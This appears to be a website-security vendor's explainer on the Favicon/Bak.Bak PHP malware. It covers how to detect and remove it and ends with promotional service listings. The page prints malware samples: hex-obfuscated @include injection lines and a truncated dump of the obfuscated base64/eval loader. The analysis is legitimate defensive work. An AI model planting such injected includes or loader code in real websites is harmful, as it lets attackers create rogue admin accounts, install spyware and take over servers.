What is the Favicon (.ico) Malware hack?


The favicon (.ico) malware creates rogue favicon.ico or random .ico files which contain malicious PHP code inside them. This malicious PHP code is known to perform dangerous actions on the websites such as URL injection, creation of adminisrator accouns in WordPress/Drupal, installing spyware/trojans, creating phishing pages etc.

However, the Favicon/Bak.Bak malware creates a malicious favicon.ico file or random files ending with the .ico extension. It pollutes your server with spam files. These files contain malicious code within them instead of the genuine icon image code.

Facing security issues because of Favicon.ico Virus? Drop us a message on the chat widget and we’d be happy to help you. Fix my website now.

Malicious code is added to the index.php and other PHP files which 'include' the .ico file.

This article also includes steps to help you with the favicon (.ico) hack removal.

Files target in this attack

  • index.php
  • wp-login.php

How to detect the Favicon Virus?

  • Scan your website for all icon (.ico) files.
  • Download all these (.ico) files on your system and rename their file extensiosn to ".txt"
  • Open the (.ico) now converted to (.txt) files and scan for PHP code, if any PHP code is found, your file is most probably infected.
  • Now scan your core files for instances where the malicious php code found in the above step was executed.
  • If the file contains gibberish text as shown in the screenshot below, then the file is not infected.

Following the above steps will help you with favicon (.ico) hack removal.

Malware examples

Malware flagged in index.php by Astra's malware scanner

Files infected with malware, flagged by Astra's malware scanner

  • @include "\x2fhome\x2fid00\x3131/d\x6fmain\x73/wid\x65-ope\x6e-net\x77orks\x2ecom/\x70ubli\x63_htm\x6c/mod\x75les/\x63olor\x2ffavi\x63on_6\x61ecc7\x2eico";
  • /home/username/public_html/modules/color/favicon_6aecc7.ico
  • @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
  • @include "\x2f/s\x67b/\x66av\x69co\x6e_5\x34e6\x65d.\x69co";
  • @include "\x2f/\x73g\x62/\x66a\x76i\x63o\x6e_\x354\x656\x65d\x2ei\x63o";
  • @include "\x2f/\x70o\x6c-\x6de\x74/\x5fh\x74m\x6c/\x76i\x65w\x2ff\x61v\x69c\x6fn\x5f3\x30a\x391\x65.\x69c\x6f";
  • @include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";
  • @include "\x2f/p\x6fl-\x6det\x2f_h\x74ml\x2fvi\x65w/\x66av\x69co\x6e_3\x30a9\x31e.\x69co";
  • @include "\x2f/po\x6c-me\x74/_h\x74ml/\x76iew\x2ffav\x69con\x5f30a\x391e.\x69co";
  • @include "\x2f/pol\x2dmet/\x5fhtml\x2fview\x2ffavi\x63on_3\x30a91e\x2eico";
  • @include "\x2fmnt\x2ftar\x67et0\x33/35\x36076\x2f363\x3244/\x77ww.\x63red\x69tfa\x69ry.\x75s/w\x65b/c\ x6fnte\x6et/w\x70-co\x6eten\x74/wf\x6cogs\x2ffav\x69con\x5fce8\x64b6.\x69co";

Symptoms & Problems with this malware

  • Rogue Admin User in CMS
  • Installs Spyware
  • Patches xmlrpc.php
  • Spammy files are created

How Favicon/Bak.Bak malware works?

  • This malware checks for a semaphore with a prefix “ALREADY_RUN_” with the following lines of malicious code: if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')){ define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
  • Thereafter, a randomly named function is declared, in this case, "rxjdqbd". This function contains a base64 encoded code and a string to translate that. This function then uses the translation rules from the first parameter into the second one. It results in a base64 decoded code which can be executed.
  • At last, the malware declares associative array along with its translation key characters. Then, the eval function is called to run the malicious script.

How to remove favicon.ico hack

  • Delete the malicious .ico file
  • Remove the malicious code in the index.php & other PHP files which include these malicious files

Learn more about backdoors in Wordpress and how to fix them.

Facing security issues because of Favicon.ico Malware? Drop us a message on the chat widget and we’d be happy to help you. Fix my website now.

How to Remove Favicon/Bak.Bak Malware

If you also find your website to be behaving crazy, follow these steps to remove the malware:

  • Scan all icon files on your server. This can be done using the grep command: grep -r -i --include=*.ico ./
  • Make a copy of these files and change their extension from .ico to .txt. So, for example, a file abc.ico would now become abc.txt.
  • Open these text files ones by one and look for any PHP code. Delete the infected .ico files.

Code Dump

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $zqhlhv = 1056; function rxjdqbd($cdfuc, $attkkyxjmu){$wfdjzocv = ''; for($i=0; $i < strlen($cdfuc); $i++){$wfdjzocv .= isset($attkkyxjmu[$cdfuc[$i]]) ? $attkkyxjmu[$cdfuc[$i]] : $cdfuc[$i];}
$udaib="rawurl" . "decode";return $udaib($wfdjzocv);}
$yoyqluklu = '%2J%2u%2J%2u%T2606_Cre%nF%nQrNNLN_oLS%nQ%n1%n2qpWW%nP%aD%2J%'.
'2u%T2606_Cre%nF%nQoLS_rNNLNC%nQ%n1%n22%nP%aD%2J%2u%T2606_Cre%nF%nQIxi_rirXK'.
'e6L0_e6Ir%nQ%n1%n22%nP%aD%2J%2u%T2rNNLN_NrdLNe60S%nF2%nP%aD%2J%2u%T2Cre_e6Ir'.
Clean My Hacked Website Now

Website Malware Cleanup Website Malware Cleanup

Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.

Removal of Security Warnings Removal of Security Warnings

If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.

Astra Website Firewall (WAF) Website Firewall (WAF)

Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.

Real Human Support Real Human Support

Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]

Astra Pro Plan
$228/year
Get Started
Malware Cleanup (12h)
Rock-solid Website Firewall
Automatic Malware Scanner
Bad Bot Protection
Blacklist Monitoring
File Upload Scanning
IP & Country Blocking
GDPR Consent Tool